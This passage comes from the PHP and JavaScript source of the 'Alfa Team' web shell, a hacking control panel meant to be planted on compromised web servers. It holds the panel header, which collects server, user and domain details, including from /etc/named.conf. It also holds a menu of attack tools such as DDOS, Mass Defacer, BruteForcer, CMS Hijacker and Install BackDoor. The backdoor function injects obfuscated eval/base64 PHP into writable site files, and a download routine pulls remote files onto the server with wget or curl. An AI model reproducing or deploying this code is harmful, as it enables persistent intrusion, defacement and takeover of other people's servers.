  1656.     d.files.innerHTML = d.files.innerHTML.replace(reg2, editor_files[fid].file+" |</b></a>");
  1657.     updateCookieEditor();
  1658. }
  1659. function updateCookieEditor(){
  1660.     setCookie("alfa_history_files", JSON.stringify(editor_files), 2012);
  1661. }
  1662. function setEditorTitle(fid, mode){
  1663.     if(mode == "out" && editor_current_file != ""){
  1664.         fid = editor_current_file;
  1665.     }
  1666.     if(editor_files[fid]){
  1667.         d.getElementsByClassName("editor-path")[0].innerHTML = (editor_files[fid].pwd + "/" + editor_files[fid].file).replace(/\/\//g, "/");
  1668.     }
  1669. }
  1670. function removeHistory(el){
  1671.     delete editor_files[el];
  1672.     if($(el)){
  1673.         $(el).parentNode.parentNode.removeChild($(el).parentNode);
  1674.     }
  1675.     var elm = d.getElementsByClassName("filestools")[0];
  1676.     if(elm){
  1677.         if(elm.getAttribute("fid") == el){
  1678.             elm.outerHTML = "";
  1679.         }
  1680.     }
  1681.     if(editor_current_file == el){
  1682.         editor_current_file = "";
  1683.     }
  1684.     updateCookieEditor();
  1685. }
  1686. function getRandom(e){
  1687.     for(var i = "undefined" == typeof e ? 20 : e, t = "", s = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", n = i; n > 0; --n) t += s[Math.floor(Math.random() * s.length)];
  1688.     return t
  1689. }
  1690. function reopen(el){
  1691.     var file_id = el.getAttribute("id")
  1692.     var pwd = editor_files[file_id].pwd;
  1693.     var filename = editor_files[file_id].file;
  1694.     editor(filename, "auto", "", pwd, file_id);
  1695. }
  1696. function copyToClipboard(el){
  1697.     var node = document.getElementById(el);
  1698.     if(document.selection){
  1699.         var range = document.body.createTextRange();
  1700.         range.moveToElementText(document.getElementById(el));
  1701.         range.select();
  1702.         document.execCommand("Copy");
  1703.         alert("text copied");
  1704.     }else if (window.getSelection()){
  1705.         var range = document.createRange();
  1706.         range.selectNode(document.getElementById(el));
  1707.         window.getSelection().removeAllRanges();
  1708.         window.getSelection().addRange(range);
  1709.         document.execCommand("copy");
  1710.         alert("text copied");
  1711.     }
  1712. }
  1713. function encrypt(str, pwd) {
  1714.     if (pwd == null || pwd.length <= 0) {
  1715.         return null;
  1716.     }
  1717.     str = alfab64(str, true);
  1718.     pwd = alfab64(pwd, true);
  1719.     var enc_chr = "";
  1720.     var enc_str = "";
  1721.     var i = 0;
  1722.     while (i < str.length) {
  1723.         for (var j = 0; j < pwd.length; j++) {
  1724.             enc_chr = str.charCodeAt(i) ^ pwd.charCodeAt(j);
  1725.             enc_str += String.fromCharCode(enc_chr);
  1726.             i++;
  1727.             if (i >= str.length) break;
  1728.         }
  1729.     }
  1730.     return alfab64(enc_str, true);
  1731. }
  1732. function reloadSetting(e){
  1733. alfaloader("block");
  1734. _Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(e.protect.value)+"&alfa2="+alfab64(e.lgpage.value)+"&alfa3="+alfab64(e.username.value)+"&alfa4="+alfab64(e.password.value)+"&alfa5="+alfab64(">>")+"&alfa6="+alfab64(e.icon.value)+"&alfa7="+alfab64(e.post_encrypt.value)+"&alfa8="+alfab64("main")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},true);
  1735. if(e.e.value==0&&e.protect.value==1)setTimeout("location.reload()",1000);
  1736. if(e.s.value!=e.icon.value)setTimeout("location.reload()",1000);
  1737. return false
  1738. }
  1739. function reloadColors(config){
  1740.     var obj = {};
  1741.     if(typeof config == "undefined"){
  1742.         d.querySelectorAll(".colors_input").forEach(function(e){
  1743.             var id = e.getAttribute("target").replace(".", "");
  1744.             obj[id] = e.value;
  1745.         });
  1746.     }else{
  1747.         obj = config;
  1748.     }
  1749.     alfaloader("block");
  1750.     var checdk = ($("use_default_color").checked?"1":"0");
  1751.     _Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(JSON.stringify(obj))+"&alfa2="+alfab64(">>")+"&alfa3="+alfab64(checdk)+"&alfa8="+alfab64("color")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e){alfaloader("none");evalJS(e);},true);
  1752. }
  1753. function alfab64(a, normal){
  1754.     if(typeof normal != "undefined" || post_encryption_mode == false){
  1755.         return window.btoa(unescape(encodeURIComponent(a)));
  1756.     }
  1757.     return encrypt(a, "'._AlfaSecretKey().'");
  1758. }
  1759. function evalCss(jcss){
  1760.     var style = document.createElement("style");
  1761.     if (style.styleSheet) {
  1762.         style.styleSheet.cssText = jcss;
  1763.     } else {
  1764.         style.appendChild(document.createTextNode(jcss));
  1765.     }
  1766.     d.getElementsByTagName("head")[0].appendChild(style);
  1767. }
  1768. function colorHandlerKey(el){
  1769.     setTimeout(function(e){
  1770.         colorHandler(el);
  1771.     }, 200);
  1772. }
  1773. function colorHandler(el){
  1774.     var target = el.getAttribute("target");
  1775.     var multi = el.getAttribute("multi");
  1776.     var ishover = target.indexOf(":hover");
  1777.     if(multi){
  1778.         var array = JSON.parse(atob(multi));
  1779.         var jcss = "";
  1780.         for(i in array.multi_selector){
  1781.             jcss += i + "{"+array.multi_selector[i].replace(/{color}/g, el.value)+"}";
  1782.         }
  1783.         evalCss(jcss);
  1784.     }
  1785.     if(ishover != -1 && !multi){
  1786.         $("input_" + target.replace(".","")).value = el.value;
  1787.         $("gui_" + target.replace(".","")).value = el.value;
  1788.         var css = target+"{color: "+el.value+";}";
  1789.         evalCss(css);
  1790.     }else{
  1791.         $("input_" + target.replace(".","")).value = el.value;
  1792.         $("gui_" + target.replace(".","")).value = el.value;
  1793.         if(target == ".header_values"){
  1794.             target = ".header,.header_values";
  1795.         }
  1796.         d.querySelectorAll(target).forEach(function(e){
  1797.             e.style.color = el.value;
  1798.         });
  1799.     }
  1800. }
  1801. function importConfig(event){
  1802.     var input = event.target;
  1803.     var reader = new FileReader();
  1804.     reader.onload = function(){
  1805.       var data = reader.result;
  1806.       try{
  1807.           var conf = JSON.parse(data);
  1808.           reloadColors(conf);
  1809.       }catch(e){
  1810.           alert("Config is invalid...!");
  1811.       }
  1812.       $("importFileBtn").value = "";
  1813.     };
  1814.     reader.readAsText(input.files[0]);
  1815. }
  1816. function checkBox(){for(i=0;i<d.files.elements.length;i++){if(d.files.elements[i].type == "checkbox"){d.files.elements[i].checked = d.files.elements[0].checked;}}}
  1817. function path_history(pos){
  1818.     _Ajax(d.URL,"a="+alfab64("GetPathHistory")+"&ajax="+alfab64("true"),function(e){g("FilesMan", e);},true);
  1819. }
  1820. function runcgi(lang){
  1821.     if(cgi_is_minimized && cgi_lang == lang){
  1822.         showEditor("cgiloader");
  1823.         return false;
  1824.     }
  1825.     _Ajax(d.URL,"a="+alfab64("cgishell")+"&alfa1="+alfab64(lang)+"&ajax="+alfab64("true"),function(e){
  1826.         d.body.style.overflow = "hidden";
  1827.         $("cgiloader").style.display = "block";
  1828.         $("cgiframe").innerHTML = e;
  1829.         cgi_lang = lang;
  1830.         if(cgi_is_minimized){
  1831.             $("cgiloader-minimized").setAttribute("class", "minimized-hide");
  1832.             setTimeout(function(){
  1833.                 $("cgiloader").removeAttribute("class");
  1834.                 if(is_minimized){
  1835.                     $("editor-minimized").style.top = "30%";
  1836.                 }
  1837.             }, 1000);
  1838.         }
  1839.     });
  1840. }
  1841. ';
  1842. echo "</script>
  1843. <form style='display:none;' id='dlForm' action='' target='_blank' method='post'>
  1844. <input type='hidden' name='a' value='dlfile'>
  1845. <input type='hidden' name='c' value=''>
  1846. <input type='hidden' name='file' value=''>
  1847. </form>
  1848. <input type='file' style='display:none;' id='importFileBtn' onchange='importConfig(event);'>
  1849. <img id='a_loader' src='".__showicon('loader')."'>";
  1850. $cmd_uname = alfaEx("uname -a",false,false);
  1851. $uname = function_exists('php_uname') ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname)>0?$cmd_uname:'( php_uname ) Function Disabled !');
  1852. if($uname=="( php_uname ) Function Disabled !"){$GLOBALS["need_to_update_header"]="true";}
  1853. echo '
  1854. </head>
  1855. <body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
  1856. <div id="up_bar"></div>
  1857. <div class="whole">
  1858. <form method="post" name="mf" style="display:none;">
  1859. <input type="hidden" name="a">
  1860. <input type="hidden" name="c" value="'.$GLOBALS['cwd'].'">';
  1861. for($s=1;$s<=10;$s++){
  1862. echo '<input type="hidden" name="alfa'.$s.'">';
  1863. }
  1864. echo '<input type="hidden" name="charset">
  1865. </form>
  1866. <div id=\'hidden_sh\'><a class="alert_green" target="_blank" href="?solevisible">Hidden Shell<br><small>Version: <span class="hidden_shell_version">'.__ALFA_VERSION__.'</span></small></a></div>
  1867. <div class="header"><table width="100%" border="0">
  1868. <tr>
  1869. <td width="3%"><span class="header_vars">Uname:</span></td>
  1870. <td colspan="2"><span class="header_values" id="header_uname">'.$uname.'</span></td>
  1871. </tr>
  1872. <tr>
  1873. <td><span class="header_vars">User:</span></td>
  1874. <td><span class="header_values" id="header_userid">'. $uid . ' [ ' . $user . ' ] </span><span class="header_vars"> Group: </span><span class="header_values" id="header_groupid">' . $gid . ' [ ' . $group . ' ]</span> </td>
  1875. <td width="12%" rowspan="8"><img style="border-radius:100px;" width="300" height="170" alt="" src="http://solevisible.com/images/alfa-iran.png" /></td>
  1876. </tr>
  1877. <tr>
  1878. <td><span class="header_vars">PHP:</span></td>
  1879. <td><b>'.@phpversion(). ' </b><span class="header_vars"> Safe Mode: '.$safe_modes.'</span></td>
  1880. </tr>
  1881. <tr>
  1882. <td><span class="header_vars">ServerIP:</span></td>
  1883. <td><b>'.(!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER['SERVER_NAME']):'????'):@$_SERVER["SERVER_ADDR"]).' <span class="header_vars">Your IP:</span><b> '.@$_SERVER["REMOTE_ADDR"].'</b></td>
  1884. </tr>
  1885. <tr>
  1886. <td width="3%"><span class="header_vars">DateTime:</span></td>
  1887. <td colspan="2"><b>'.date('Y-m-d H:i:s').'</b></td>
  1888. </tr>
  1889. <tr>
  1890. <td><span class="header_vars">Domains:</span></td>
  1891. <td width="76%"><span class="header_values" id="header_domains">';
  1892. if($GLOBALS['sys']=='unix'){
  1893. $d0mains = _alfa_file("/etc/named.conf",false);
  1894. if(!$d0mains){echo "Cant Read [ /etc/named.conf ]";$GLOBALS["need_to_update_header"]="true";}else{
  1895. $count=0;
  1896. foreach($d0mains as $d0main){
  1897. if(@strstr($d0main,"zone")){
  1898. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  1899. flush();
  1900. if(strlen(trim($domains[1][0])) > 2){
  1901. flush();
  1902. $count++;}}}
  1903. echo "$count Domains";}}
  1904. else{echo("Cant Read [ /etc/named.conf ]");}
  1905. echo '</span></td>
  1906. </tr>
  1907. <tr>
  1908. <td height="16"><span class="header_vars">HDD:</span></td>
  1909. <td><span class="header_vars">Total:</span><b>'.alfaSize($totalSpace).' </b><span class="header_vars">Free:</span><b>' . alfaSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]</b></td>
  1910. </tr>';
  1911. if($GLOBALS['sys']=='unix'){
  1912. $useful_downloader = '<tr><td height="18" colspan="2"><span class="header_vars">useful:</span><span class="header_values" id="header_useful">--------------</span></td></tr><td height="0" colspan="2"><span class="header_vars">Downloader: </span><span class="header_values" id="header_downloader">--------------</span></td></tr>';
  1913. if(!@ini_get('safe_mode')){
  1914. if(strlen(alfaEx("id",false,false))>0){
  1915. echo '<tr><td height="18" colspan="2"><span class="header_vars">Useful : </span>';
  1916. $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzialfa2','nc','locate','suidperl');
  1917. $x=0;
  1918. foreach($userful as $item)if(alfaWhich($item)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item.'</span>';}
  1919. if($x==0){echo "<span class='header_values' id='header_useful'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}
  1920. echo '</td>
  1921. </tr>
  1922. <tr>
  1923. <td height="0" colspan="2"><span class="header_vars">Downloader: </span>';
  1924. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  1925. $x=0;
  1926. foreach($downloaders as $item2)if(alfaWhich($item2)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item2.'</span>';}
  1927. if($x==0){echo "<span class='header_values' id='header_downloader'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}
  1928. echo '</td>
  1929. </tr>';
  1930. }else{
  1931. echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";
  1932. }
  1933. }else{
  1934. echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";
  1935. }
  1936. }else{
  1937. echo '<tr><td height="18" colspan="2"><span class="header_vars">Windows:</span><b>';
  1938. echo alfaEx('ver',false,false);
  1939. echo '</td>
  1940. </tr> <tr>
  1941. <td height="0" colspan="2"><span class="header_vars">Downloader: </span><b>-------------</b></td>
  1942. </tr></b>';
  1943. }
  1944. $quotes = (function_exists('get_magic_quotes_gpc')?get_magic_quotes_gpc():'0');if ($quotes == "1" or $quotes == "on"){$magic = '<b><span class="header_on">ON</span>';}else{$magic = '<span class="header_off">OFF</span>';}
  1945. echo '<tr>
  1946. <td height="16" colspan="2"><span class="header_vars">Disable Functions: </span><b>'.Alfa_GetDisable_Function().'</b></td>
  1947. </tr>
  1948. <tr>
  1949. <td height="16" colspan="2"><span class="header_vars">CURL :</span>'.$curl.' | <span class="header_vars">SSH2 : </span>'.$ssh2.' | <span class="header_vars">Magic Quotes : </span>'.$magic.' | <span class="header_vars"> MySQL :</span>'.$mysql.' | <span class="header_vars">MSSQL :</span>'.$mssql.' | <span class="header_vars"> PostgreSQL :</span>'.$pg.' | <span class="header_vars"> Oracle :</span>'.$or.' '.($GLOBALS['sys']=="unix"?'| <span class="header_vars"> CGI :</span> '.$cgi_shell:"").'</td><td width="15%"><center><a href="http://zone-h.org/archive/notifier=ALFA%20TEaM%202012" target="_blank"><span><font class="solevisible-text" color="#0F0">Sole Sad & Invisible</font></span></a></center></td>
  1950. </tr>
  1951. <tr>
  1952. <td height="11" colspan="3"><span class="header_vars">Open_basedir :</span><b>'.$open_b.'</b> | <span class="header_vars">Safe_mode_exec_dir :</span><b>'.$safe_exe.'</b> | <span class="header_vars"> Safe_mode_include_dir :</span></b>'.$safe_include.'</b></td>
  1953. </tr>
  1954. <tr>
  1955. <td height="11"><span class="header_vars">SoftWare: </span></td>
  1956. <td colspan="2"><b>'.@getenv('SERVER_SOFTWARE').'</b></td>
  1957. </tr>';
  1958. if($GLOBALS['sys']=="win"){
  1959. echo '<tr>
  1960. <td height="12"><span class="header_vars">DRIVE:</span></td>
  1961. <td colspan="2"><b>'.$drives.'</b></td>
  1962. </tr>';
  1963. }
  1964. echo '<tr>
  1965. <td height="12"><span class="header_vars">PWD:</span></td>
  1966. <td colspan="2"><span id="header_cwd">'.$cwd_links.' </span><a href="javascript:void(0);" onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')"><span class="home_shell">[ Home Shell ]</span> </a><a href="javascript:void(0);" onclick="path_history(\'back\');"><span class="back_shell">[ BACK ]</span></a></td>
  1967. </tr>
  1968. </table>
  1969. </div>
  1970. <div id="meunlist">
  1971. <ul>
  1972. ';
  1973. $li = array('FilesMan'=>'Home','proc'=>'Process','phpeval'=>'Eval','sql'=>'SQL Manager','dumper'=>'Mysql Dumper','hash'=>'En-Decoder','connect'=>'BC','ssh2'=>'SSH2',
  1974. 'zoneh'=>'ZONE-H','dos'=>'DDOS','safe'=>'ByPasser','cgishell'=>'Cgi Shell','ssiShell'=>'SSI SHELL','cpcrack'=>'Hash Tools',
  1975. 'portscanner'=>'Port Scaner','basedir'=>'Open BaseDir','mail'=>'Fake Mail','ziper'=>'Compressor','IndexChanger'=>'Index Changer','pwchanger'=>'Add New Admin','ShellInjectors'=>'Shell Injectors',
  1976. 'php2xml'=>'PHP2XML','cloudflare'=>'CloudFlare','Whmcs'=>'Whmcs DeCoder','symlink'=>'Symlink','MassDefacer'=>'Mass Defacer','Crackers'=>'BruteForcer','searcher'=>'Searcher',
  1977. 'cmshijacker'=>'CMS Hijacker','remotedl'=>'Remote Upload','inbackdoor'=>'Install BackDoor','whois'=>'Whois','settings'=>'Alfa Settings','plus'=>'<span class="alfa_plus">Alfa +</font>','selfrm'=>'Remove Shell'
  1978. );
  1979. foreach($li as $key=>$value){
  1980. echo('<li><a href="javascript:void(0);" class="menu_options" onclick="g(\''.$key.'\',null,\'\',\'\',\'\');">'.$value.'</a></li>'."\n");
  1981. }
  1982. if(!empty($_SESSION['AlfaUser']) && !empty($_SESSION['AlfaPass']))
  1983. echo '<li><a href="javascript:void(0);" onclick="g(\'logout\',null,\'\',\'\',\'\');setTimeout(function(){location.reload();},2000);"><font color="red">LogOut</font></a></li></ul></div>';
  1984. else
  1985. echo '</ul></div>';}else{
  1986. @error_reporting(E_ALL ^ E_NOTICE);
  1987. @ini_set('error_log',NULL);
  1988. @ini_set('log_errors',0);
  1989. @ini_set('max_execution_time',0);
  1990. @ini_set('magic_quotes_runtime', 0);
  1991. @set_time_limit(0);
  1992. }}
  1993. function alfalogout(){
  1994. unset($_SESSION['AlfaUser'],$_SESSION['AlfaPass']);
  1995. echo("<center><font color='red'>Logout...</font></center>");
  1996. }
  1997. function showAnimation($name){
  1998.     return '-webkit-animation: '.$name.' 800ms ease-in-out forwards;-moz-animation: '.$name.' 800ms ease-in-out forwards;-ms-animation: '.$name.' 800ms ease-in-out forwards;animation: '.$name.' 800ms ease-in-out forwards;';
  1999. }
  2000. function __showicon($r){
  2001.     $s['btn']='http://solevisible.com/images/btn.png';
  2002.     $s['alfamini']='http://solevisible.com/images/alfamini.png';
  2003.     $s['loader']='http://solevisible.com/images/loader.png';
  2004.     //return 'data:image/png;base64,'.__get_resource($s[$r]);
  2005.     return $s[$r];
  2006. }
  2007. function alfainbackdoor(){
  2008. alfahead();
  2009. echo '<div class=header><center><p><div class="txtfont_header">| Install BackDoor |</div></p><h3><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'file\')">| In File | </a><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'db\')">| In DataBase | </a></h3></center>';
  2010. $error = '<font color="red">Error In Inject BackDoor...!<br>File Loader is not Writable Or Not Exists...!</font>';
  2011. $success= '<font color="green">Success...!';
  2012. $textarea = "<div style='display:none;' id='backdoor_textarea'><div class='txtfont'>Your Shell:</div><p><textarea name='shell' rows='19' cols='103'><?php\n\techo('Alfa Team is Here...!');\n?></textarea></p></div>";
  2013. $select = "<div class='txtfont'>Use:</div> <select name='method' style='width:155px;' onChange='inBackdoor(this);'><option value='alfa'>Alfa Team Uploader</option><option value='my'>My Private Shell</option></select>";
  2014. $cwd = 'Example: /home/alfa/public_html/index.php';
  2015. if($_POST['alfa1']=='file'){
  2016. echo("<center><p><div class='txtfont_header'>| In File |</div></p><p><form onsubmit=\"g('inbackdoor',null,'file',this.method.value,this.file.value,this.shell.value,this.key.value);return false;\">{$select} <div class='txtfont'>Backdoor Loader:</div> <input type='text' name='file' size='50' placeholder='{$cwd}'> <div class='txtfont'>Key: </div> <input type='text' name='key' size='10' value='alfa'> <input type='submit' value=' '>{$textarea}</form></p></center>");
  2017. if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa4']!=''){
  2018. $method = $_POST['alfa2'];
  2019. $file = $_POST['alfa3'];
  2020. $shell = $_POST['alfa4'];
  2021. $key = str_replace(array('"','\''),'',trim($_POST['alfa5']));
  2022. if($key=='')$key='alfa';
  2023. if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}
  2024. $code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x("'.$shell.'");exit;}?>';
  2025. if(@is_file($file)&&@is_writable($file)){@file_put_contents($file,$code."\n".@file_get_contents($file));__alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');}else{__alert($error);}}}
  2026. if($_POST['alfa1']=='db'){
  2027. echo("<center><p><div class='txtfont_header'>| In DataBase |</div></p>".getConfigHtml('all')."<p><form onsubmit=\"g('inbackdoor',null,'db',this.db_host.value,this.db_username.value,this.db_password.value,this.db_name.value,this.file.value,this.method.value,this.shell.value,this.key.value);return false;\">");
  2028. $table = array('td1' =>
  2029. array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
  2030. 'td2' =>
  2031. array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
  2032. 'td3' =>
  2033. array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
  2034. 'td4' =>
  2035. array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
  2036. 'td5' =>
  2037. array('color' => 'FFFFFF', 'tdName' => 'Backdoor Loader: ', 'inputName' => 'file', 'inputValue' => $cwd, 'inputSize' => '50', 'placeholder' => true),
  2038. 'td6' =>
  2039. array('color' => 'FFFFFF', 'tdName' => 'Key: ', 'inputName' => 'key', 'inputValue' => 'alfa', 'inputSize' => '50')
  2040. );
  2041. create_table($table);
  2042. echo("<p>{$select}</p>");
  2043. echo($textarea);
  2044. echo("<p><input type='submit' value=' '></p></form></p></center>");
  2045. if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa5']!=''&&$_POST['alfa6']!=''){
  2046. $dbhost = $_POST['alfa2'];
  2047. $dbuser = $_POST['alfa3'];
  2048. $dbpw = $_POST['alfa4'];
  2049. $dbname = $_POST['alfa5'];
  2050. $file = $_POST['alfa6'];
  2051. $method = $_POST['alfa7'];
  2052. $shell = $_POST['alfa8'];
  2053. $key = str_replace(array('"','\''),'',trim($_POST['alfa9']));
  2054. if($key=='')$key='alfa';
  2055. if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}
  2056. if($conn = mysqli_connect($dbhost,$dbuser,$dbpw,$dbname)){
  2057. $code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$conn=mysqli_connect("'.str_replace('"','\"',$dbhost).'","'.str_replace('"','\"',$dbuser).'","'.str_replace('"','\"',$dbpw).'","'.str_replace('"','\"',$dbname).'");$q=mysqli_query($conn,"SELECT `code` FROM alfa_bc LIMIT 0,1");$r=mysqli_fetch_assoc($q);$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x($r["code"]);exit;}?>';
  2058. if(@is_file($file)&&@is_writable($file)){
  2059. @mysqli_query($conn,'DROP TABLE `alfa_bc`');
  2060. @mysqli_query($conn,'CREATE TABLE `alfa_bc` (code LONGTEXT)');
  2061. @mysqli_query($conn,'INSERT INTO `alfa_bc` VALUES("'.$shell.'")');
  2062. @file_put_contents($file,$code."\n".@file_get_contents($file));
  2063. __alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');}else{__alert($error);}}}}
  2064. echo('</div>');
  2065. alfafooter();
  2066. }
  2067. function alfawhois(){
  2068. echo("<div class='header'><center><p><div class='txtfont_header'>| Whois |</div></p><p><form onsubmit=\"g('whois',null,this.url.value,'>>');return false;\"><div class='txtfont'>Url: </div> <input type='text' name='url' style='text-align:center;' size='50' placeholder='google.com'> <input type='submit' value=' '></form></p></center>");
  2069. if($_POST['alfa2']=='>>'&&!empty($_POST['alfa1'])){
  2070. $site = str_replace(array('http://','https://','www.','ftp://'),'',$_POST['alfa1']);
  2071. $target = 'http://api.whoapi.com/?apikey=093b6cb9e6ea724e101928647df3e009&r=whois&domain='.$site;
  2072. $data = @file_get_contents($target);
  2073. if($data==''){$get = new AlfaCURL();$get->ssl = true;$data = $get->Send($target);}
  2074. $target = @json_decode($data,true);
  2075. echo __pre();
  2076. if(is_array($target)){echo($target["whois_raw"]);}else{echo alfaEx("whois ".$site);}}
  2077. echo("</div>");
  2078. }
  2079. function alfaremotedl(){
  2080. alfahead();
  2081. echo("<div class='header'><center><p><div class='txtfont_header'>| Upload From Url |</div></p><p>
  2082. <form onsubmit=\"g('remotedl',null,this.d.value,this.p.value,'>>');return false;\">
  2083. <p><div class='txtfont'>Url: </div>&nbsp;&nbsp;&nbsp;<input type='text' name='d' size='50'></p>
  2084. <div class='txtfont'>Path:</div> <input type='text' name='p' size='50' value='".$GLOBALS['cwd']."'><p><input type='submit' value=' '></p>
  2085. </form></p></center>");
  2086. if(isset($_POST['alfa1'],$_POST['alfa2'],$_POST['alfa3'])&&!empty($_POST['alfa1'])&&$_POST['alfa3']=='>>'){
  2087. echo __pre();
  2088. $url = $_POST['alfa1'];
  2089. $path = $_POST['alfa2'];
  2090. echo('<center>');
  2091. if(__download($url,$path)){
  2092. echo('<font color="green">Success...!</font>');
  2093. }else{
  2094. echo('<font color="red">Error...!</font>');
  2095. }
  2096. echo('</center>');
  2097. }
  2098. echo("</div>");
  2099. alfafooter();
  2100. }
  2101. function __download($url,$path=false){
  2102. if(!preg_match("/[a-z]+:\/\/.+/",$url)) return false;
  2103. $saveas = basename(rawurldecode($url));
  2104. if($path){$saveas=$path.$saveas;}
  2105. if($content = __read_file($url)){
  2106. if(@is_file($saveas))@unlink($saveas);
  2107. if(__write_file($saveas, $content)){return true;}}
  2108. $buff = alfaEx("wget ".$url." -O ".$saveas);
  2109. if(@is_file($saveas)) return true;
  2110. $buff = alfaEx("curl ".$url." -o ".$saveas);
  2111. if(@is_file($saveas)) return true;
  2112. $buff = alfaEx("lwp-download ".$url." ".$saveas);
  2113. if(@is_file($saveas)) return true;
  2114. $buff = alfaEx("lynx -source ".$url." > ".$saveas);
  2115. if(@is_file($saveas)) return true;
  2116. $buff = alfaEx("GET ".$url." > ".$saveas);
  2117. if(@is_file($saveas)) return true;
  2118. $buff = alfaEx("links -source ".$url." > ".$saveas);
  2119. if(@is_file($saveas)) return true;
  2120. $buff = alfaEx("fetch -o ".$saveas." -p ".$url);
  2121. if(@is_file($saveas)) return true;
  2122. return false;
  2123. }
  2124. function clean_string($string){
  2125.   if(function_exists("iconv")){
  2126.       $s = trim($string);
  2127.       $s = iconv("UTF-8", "UTF-8//IGNORE", $s);
  2128.   }
  2129.   return $s;
  2130. }
  2131. function __read_file($file, $boom = true){
  2132. $content = false;
  2133. if($fh = @fopen($file, "rb")){
  2134. $content = "";
  2135. while(!feof($fh)){
  2136. $content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192);
  2137. }
  2138. }
  2139. if(empty($content)||!$content){
  2140.     $content = alfaEx("cat '".addslashes($file)."'");
  2141. }
  2142. return $content;
  2143. }
  2144. function alfaSettings(){
  2145. alfahead();
  2146. AlfaNum(6,7,8,9,10);
  2147. echo '<div class=header><center><p><div class="txtfont_header">| Settings |</div></p><h3><a href=javascript:void(0) onclick="g(\'settings\',null,null,null,null,null,null,null,null,\'main\')">| Generall Setting | </a><a href=javascript:void(0) onclick="g(\'settings\',null,null,null,null,null,null,null,null,\'color\')">| Change Color | </a></h3></center>';
  2148. if($_POST["alfa8"] == "main"){
  2149. echo '<p><center><div class="txtfont_header">| Settings |</div></p><form onSubmit="reloadSetting(this);return false;" method=\'post\'>';
  2150. $lg_array = array('0'=>'No','1'=>'Yes');
  2151. $penc_array = array('false'=>'No','true'=>'Yes');
  2152. $protect_html = "";
  2153. $icon_html = "";
  2154. $postEnc_html = "";
  2155. $login_html = "";
  2156. foreach($lg_array as $key=>$val)$protect_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['safemode']=='1'?'selected':'').'>'.$val.'</option>';
  2157. foreach($lg_array as $key=>$val)$icon_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['show_icons']=='1'?'selected':'').'>'.$val.'</option>';
  2158. foreach($penc_array as $key=>$val)$postEnc_html .= '<option value="'.$key.'" '.(!empty($_POST['alfa7'])&&$_POST['alfa7']==$key?"selected":(__ALFA_POST_ENCRYPTION__&&empty($_POST['alfa7'])?'selected':'')).'>'.$val.'</option>';
  2159. $lg_array = array("gui"=>"GUI","500"=>"500 Internal Server Error","403"=>"403 Forbidden","404"=>"404 NotFound");
  2160. foreach($lg_array as $key=>$val)$login_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['login_page']==$key?'selected':'').'>'.$val.'</option>';
  2161. echo '';
